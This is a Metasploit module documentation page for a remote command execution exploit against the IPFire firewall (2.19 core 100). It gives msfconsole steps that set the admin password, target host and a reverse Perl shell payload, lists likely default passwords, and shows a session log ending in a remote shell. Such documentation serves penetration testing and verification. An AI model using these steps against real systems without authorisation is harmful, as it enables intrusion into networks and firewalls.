metasploit-framework/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md

1.5 KiB

Vulnerable Application

Official Source: ipfire

This module has been verified against:

  1. 2.19 core 100
  2. 2.19 core 110 (exploit-db, not metasploit module)

Verification Steps

  1. Install the firewall
  2. Start msfconsole
  3. Do: use exploit/linux/http/ipfire_oinkcode_exec
  4. Do: set password admin or whatever it was set to at install
  5. Do: set rhost 10.10.10.10
  6. Do: set payload cmd/unix/reverse_perl
  7. Do: set lhost 192.168.2.229
  8. Do: exploit
  9. You should get a shell.

Options

PASSWORD

Password is set at install. May be blank, 'admin', or 'ipfire'.

Scenarios

  msf > use exploit/linux/http/ipfire_oinkcode_exec 
  msf exploit(ipfire_oinkcode_exec) > set password admin
  password => admin
  msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.2.201
  rhost => 192.168.2.201
  msf exploit(ipfire_oinkcode_exec) > set verbose true
  verbose => true
  msf exploit(ipfire_oinkcode_exec) > check
  [*] 192.168.2.201:444 The target appears to be vulnerable.
  msf exploit(ipfire_oinkcode_exec) > exploit
  
  [*] Started reverse TCP handler on 192.168.2.117:4444 
  [*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.201:38412) at 2017-06-14 21:12:21 -0400
  id
  uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
  whoami
  nobody